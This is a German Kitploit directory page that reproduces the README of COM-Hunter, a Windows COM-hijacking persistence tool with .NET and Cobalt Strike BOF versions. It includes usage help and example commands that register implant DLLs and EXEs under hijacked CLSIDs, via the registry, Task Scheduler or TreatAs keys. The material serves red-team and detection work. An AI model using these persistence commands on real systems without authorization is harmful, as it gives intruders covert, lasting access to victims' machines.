Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
COM-Hunter — Windows COM-Hijacking-Persistenztool mit den Modi search, classic, Task Scheduler und TreatAs. Verfügbar als .NET-Executable und Cobalt Strike BOF für Red-Team-Operationen. | Kitploit
Tools/GitHubGitHub/nickvourd/com-hunter
Privilege EscalationPersistenzmechanismenPenetrationstestsRed Teaming
GitHubnickvourd/com-hunter

COM-Hunter

Windows COM-Hijacking-Persistenztool mit den Modi search, classic, Task Scheduler und TreatAs. Verfügbar als .NET-Executable und Cobalt Strike BOF für Red-Team-Operationen.

Repository anzeigen
38861vor 24 TagenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

COM-Hunter

COM Hijacking VOODOO



GitHub License GitHub Repo stars
GitHub forks GitHub watchers GitHub contributors

Beschreibung

COM-Hunter ist ein COM-Hijacking-Persistenztool.

Verfügbar sowohl in einer .NET-Version als auch in einer BOF-Variante, die vollständig mit Cobalt Strike kompatibel ist.

Static Badge Static Badge Static Badge

Die folgende Liste erklärt die verfügbaren Modi:

  • Suchmodus: Sucht nach CLSIDs basierend auf LocalServer32, InprocServer32 und Registrierungseinträgen unter sowohl HKLM als auch HKCU.
  • Klassischer Persistenzmodus: Führt klassische COM-Hijacking-Persistenz mit LocalServer32 oder InprocServer32 durch.
  • Taskplaner-Modus: Stellt automatisch COM-Hijacking-Persistenz über den Taskplaner mit LocalServer32 oder InprocServer32 her.
  • TreatAs-Modus: Führt COM-Hijacking-Persistenz über den TreatAs-Registrierungsschlüssel und eine gefälschte (weiterleitbare) CLSID mit LocalServer32 oder InprocServer32 durch.
  • Entfernungsmodus: Entfernt Persistenzmechanismen, die auf LocalServer32, InprocServer32 und verwandten Registrierungseinträgen unter sowohl als auch basieren.

ℹ️ Dieses Tool wurde ausgewählt und ist stolzer Teil des Cobalt Strike Community Kit.

Wenn Sie Fehler finden, zögern Sie nicht, sie zu melden. Ihr Feedback ist wertvoll, um die Qualität dieses Projekts zu verbessern!

Haftungsausschluss

Die Autoren und Mitwirkenden dieses Projekts haften nicht für die illegale Nutzung des Tools. Es ist ausschließlich für Bildungszwecke bestimmt. Die Benutzer sind für die Einhaltung der gesetzlichen Bestimmungen verantwortlich.

Inhaltsverzeichnis

  • COM-Hunter
    • Beschreibung
    • Haftungsausschluss
    • Inhaltsverzeichnis
    • Danksagung
    • Verwendung
    • .NET-Beispiele
    • BOF-Implementierung
    • Referenzen

Danksagung

Dieses Projekt wurde mit ❤️ erstellt von @nickvourd && @S1ckB0y1337.

Besonderer Dank geht an meinen Freund Marios Gyftos für seine unschätzbare Hilfe während der Beta-Testphase dieses Tools.

Inspiriert vom RTO-Kurs von @zeropointsecltd.

BOF-Implementierung inspiriert von Lefteris Panos und seinem großartigen Projekt RegPersist.

Die Dateien base.c und bofdefs.h sind direkte Kopien aus dem Projekt TrustedSec's CS-Situational-Awareness-BOF.

Verwendung

root@kitploit:~
 ██████╗ ██████╗ ███╗   ███╗      ██╗  ██╗██╗   ██╗███╗   ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║      ██║  ██║██║   ██║████╗  ██║╚══██╔══╝██╔════╝██╔══██╗
██║     ██║   ██║██╔████╔██║█████╗███████║██║   ██║██╔██╗ ██║   ██║   █████╗  ██████╔╝
██║     ██║   ██║██║╚██╔╝██║╚════╝██╔══██║██║   ██║██║╚██╗██║   ██║   ██╔══╝  ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║      ██║  ██║╚██████╔╝██║ ╚████║   ██║   ███████╗██║  ██║
 ╚═════╝ ╚═════╝ ╚═╝     ╚═╝      ╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═══╝   ╚═╝   ╚══════╝╚═╝  ╚═╝

                                   Version: 3.0
                             @nickvourd && @S1ckB0y1337
                  ~ Inspired during the RTO course by @zeropointsecltd ~

Usage: COM_Hunter.exe <mode> <options>

[+] Available Modes:
    search             Search Mode
    persist            Classic Persist Mode
    tasksch            Task Scheduler Mode
    treatas            TreatAs Mode
    remove             Remove Mode

[+] Search Mode:
Usage:  COM-Hunter.exe search <CLSID> <options>
    -a, --all                   Search DLL and EXE implementations in HKLM and HKCU
    -i, --inprocserver32        Search DLL implementations in HKLM and HKCU
    -l, --localserver32         Search EXE implementations in HKLM and HKCU
    -m, --machine               Search DLL and EXE implementations in HKLM
    -u, --user                  Search DLL and EXE implementations in HKCU

[+] Classic Persist Mode:
Usage:  COM-Hunter.exe persist <CLSID> <binary_path> <option>
    -i, --inprocserver32        Set DLL implementation
    -l, --localserver32         Set EXE implementation

[+] Task Scheduler Mode:
Usage:  COM-Hunter.exe tasksch <binary_path> <option>
    -i, --inprocserver32        Set DLL implementation
    -l, --localserver32         Set EXE implementation

[+] TreatAs Mode:
Usage:  COM-Hunter.exe treatas <CLSID> <fake_CLSID> <binary_path> <option>
    -i, --inprocserver32        Set DLL implementation
    -l, --localserver32         Set EXE implementation

[+] Remove Mode:
Usage:  COM-Hunter.exe remove <CLSID> <options>
    -a, --all                   Remove DLL and EXE implementations in HKLM and HKCU
    -i, --inprocserver32        Remove DLL implementations in HKLM and HKCU
    -l, --localserver32         Remove EXE implementations in HKLM and HKCU
    -m, --machine               Remove DLL and EXE implementations in HKLM
    -u, --user                  Remove DLL and EXE implementations in HKCU

.NET-Beispiele

ℹ️ Suche nach DLL- und EXE-Implementierungen in HKLM und HKCU:

root@kitploit:~
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a

ℹ️ Suche nach EXE-Implementierungen in HKLM und HKCU:

root@kitploit:~
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l

ℹ️ Erweiterte Suche nach EXE-Implementierungen in HKLM:

root@kitploit:~
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine

ℹ️ Suche nach EXE- und DLL-Implementierungen in HKCU:

root@kitploit:~
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user

ℹ️ Klassische Persistenz mit DLL-Implementierung durchführen:

root@kitploit:~
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i

ℹ️ Klassische Persistenz mit EXE-Implementierung durchführen:

root@kitploit:~
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32

ℹ️ Persistenz über Taskplaner mit DLL-Implementierung durchführen:

root@kitploit:~
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32

ℹ️ Persistenz über den TreatAs-Registrierungsschlüssel und eine gefälschte (weiterleitbare) CLSID mit DLL-Implementierung durchführen:

root@kitploit:~
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i

ℹ️ DLL-Implementierungspersistenz in HKCU entfernen mit:

root@kitploit:~
.\COM-Hunter.exe remove AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 -i -u

BOF-Implementierung

ℹ️ Erforderliche MinGW-w64-Toolchain (x86_64-w64-mingw32-gcc und i686-w64-mingw32-gcc)

ℹ️ Die BOF-Objekte für beide Architekturen kompilieren:

root@kitploit:~
./make_all.sh

Dies wird:

  1. Die com_hunter_*-Verzeichnisse erstellen.
  2. com_hunter_*.x64.o und com_hunter_*.x86.o kompilieren.
  3. Beide Objektdateien in die com_hunter_*/-Verzeichnisse verschieben.

ℹ️ Nach dem Kompilieren der BOF-Module einfach com_hunter_bof.cna in Cobalt Strike laden.

ℹ️ Um Build-Artefakte zu bereinigen, gehen Sie in jedes src-Verzeichnis und führen Sie aus:

root@kitploit:~
make clean

Referenzen

  • Persistenz: „das Fortbestehen oder die verlängerte Existenz von etwas“: Teil 2 – COM-Hijacking von MDSec
  • Missbrauch der COM-Registrierungsstruktur (Teil 2): Hijacking- und Ladetechniken von BOHOPS
  • Userland-Persistenz mit geplanten Aufgaben und COM-Handler-Hijacking von Enigma0x3
  • COM-Objekte-Hijacking von Virus Total
  • CS-Remote-OPs-BOF GitHub Repository von TrustedSec
  • Eine Einführung für Entwickler in Beacon Object Files von TrustedSec
  • BOF-Entwicklungs- und Tradecraft-Kurs von Zeropoint Security
Tool herunterladen
HKLM
HKCU